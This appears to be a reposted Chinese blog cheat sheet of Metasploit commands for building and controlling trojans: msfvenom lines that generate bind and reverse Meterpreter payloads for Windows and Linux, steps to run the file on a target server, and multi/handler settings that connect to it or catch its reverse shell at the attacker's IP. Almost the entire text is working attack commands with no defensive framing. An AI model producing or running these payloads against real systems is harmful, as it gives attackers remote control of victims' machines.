前言
为了方便平时使用,记录一下操作命令
文章目录
一、正向连接的木马🍺
注意:
lhost
为本地地址,
rhost
为目标地址
1、👋Windows
生成连接木马
msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.63.135 lport=6666-f exe -o test.exe
将木马放到目标服务器运行
使用模块连接我们的木马
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.53.135 # 目标主机ip
set lport 6666
exploit
2、👋Linux
使用
msfvenom
模块生成连接木马
msfvenom -p linux/x64/meterpreter/bind_tcp lhost=192.168.53.135 lport=6666-f elf > test.elf
- x64生成64位的🐎
- x86生成32位的🐎
elf
为可执行的二进制文件
若传入的木马没权限执行
chmod +x test.elf # 给木马程序赋予可执行权限
使用模块进行连接
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.53.135 # 目标主机ip
set lport 6666
exploit
二、反向连接的木马🍺
1、👋Windows
使用模块生成反弹木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.53.135 lport=6666-f exe -o test.exe
监听反弹的木马
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.53.135 # 我们的本机IP
set lport 6666
exploit
2、👋Linux
生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.53.135 LPORT=6666-f elf > test.elf
监听反弹的木马
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.53.135
set lport 6666
exploit
标签:
网络安全
本文转载自: https://blog.csdn.net/m0_55793759/article/details/127786540
版权归原作者 迷途羔羊pro 所有, 如有侵权,请联系我们删除。
版权归原作者 迷途羔羊pro 所有, 如有侵权,请联系我们删除。